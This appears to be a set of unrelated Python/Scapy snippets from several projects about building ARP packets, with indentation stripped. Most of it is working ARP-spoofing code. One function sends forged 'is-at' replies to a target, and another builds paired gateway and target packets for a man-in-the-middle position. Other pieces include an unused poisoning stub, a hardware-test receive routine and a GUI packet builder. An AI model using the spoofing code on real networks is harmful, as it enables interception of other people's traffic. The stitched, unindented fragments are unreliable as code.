def sendARP(args):
a = ARP()
a.pdst = args.dip
a.psrc = args.sip
a.hwsrc = args.smac
a.op = 'who-has '
try:
while 1:
send(a, 1)
time.sleep(5)
except KeyboardInterrupt:
pass
def arpPoisoning(src_mac, src_ip, tgt_ip, tgt_mac):
"""
Not used ... 1st poison the network into thinking you are the victim as well as the reflector
"""
#Here Ethernet layer will need to be changed too
arp = ARP()
arp.hwsrc = src_mac
arp.psrc = src_ip
arp.hwdst = tgt_mac
arp.pdst = tgt_ip
arp.op = ARP.who_has
#sendp(arp, iface=INTERFACE)
send(arp, iface=INTERFACE)
def spoof(target_ip, host_ip, iface=None, verbose=True):
target_mac = get_mac(target_ip)
# op = {1:'who-has', 2:'is-at'}
arp_pkt = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op=2)
self_mac = arp_pkt.hwsrc
if iface:
self_mac = sc.get_if_hwaddr(iface)
arp_pkt.hwsrc = self_mac
send(arp_pkt, verbose=0)
if verbose:
print('[+] sent to {} : {} is-at {}'.format(target_ip, host_ip, self_mac))
def spoof_packets(self):
print("[*] Spoofing packets...")
gateway_packet = ARP()
gateway_packet.op = 2
gateway_packet.psrc = self.gateway_ip
gateway_packet.hwsrc = self.gateway_mac
gateway_packet.pdst = self.target_ip
gateway_packet.hwdst = self.target_mac
print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
self.gateway_ip, self.target_ip))
target_packet = ARP()
target_packet.op = 2
target_packet.psrc = self.target_ip
target_packet.hwsrc = self.target_mac
target_packet.pdst = self.gateway_ip
target_packet.hwdst = self.gateway_mac
print("[*] Created ARP packet -- {{src={0}, dst={1}}}".format(
self.target_ip, self.gateway_ip))
return gateway_packet, target_packet
async def recv(self):
rx_frame = await self.sink.recv()
eth = Ether()
eth.dst = rx_frame.eth_dest_mac.integer.to_bytes(6, 'big')
eth.src = rx_frame.eth_src_mac.integer.to_bytes(6, 'big')
eth.type = rx_frame.eth_type.integer
arp = ARP()
arp.hwtype = rx_frame.arp_htype.integer
arp.ptype = rx_frame.arp_ptype.integer
arp.hwlen = rx_frame.arp_hlen.integer
arp.plen = rx_frame.arp_plen.integer
arp.op = rx_frame.arp_oper.integer
arp.hwsrc = rx_frame.arp_sha.integer.to_bytes(6, 'big')
arp.psrc = rx_frame.arp_spa.integer
arp.hwdst = rx_frame.arp_tha.integer.to_bytes(6, 'big')
arp.pdst = rx_frame.arp_tpa.integer
rx_pkt = eth / arp
return Ether(bytes(rx_pkt))
def getARPPacket(self):
"""
构造ARP数据包
:return:
"""
try:
arp_packet = ARP()
arp_packet.hwtype = int(self.entries[0].get())
arp_packet.ptype = int(self.entries[1].get())
arp_packet.op = int(self.entries[2].get())
arp_packet.hwlen = int(self.entries[3].get())
arp_packet.plen = int(self.entries[4].get())
arp_packet.hwdst = self.entries[5].get()
arp_packet.psrc = self.entries[6].get()
arp_packet.hwsrc = self.entries[7].get()
arp_packet.pdst = self.entries[8].get()
arp_packet.show()
self.resultText.insert('end', arp_packet.summary() + '\n')
self.resultText.insert('end', str(arp_packet) + '\n')
return Ether() / arp_packet
except Exception as e:
print(e.with_traceback())
finally:
pass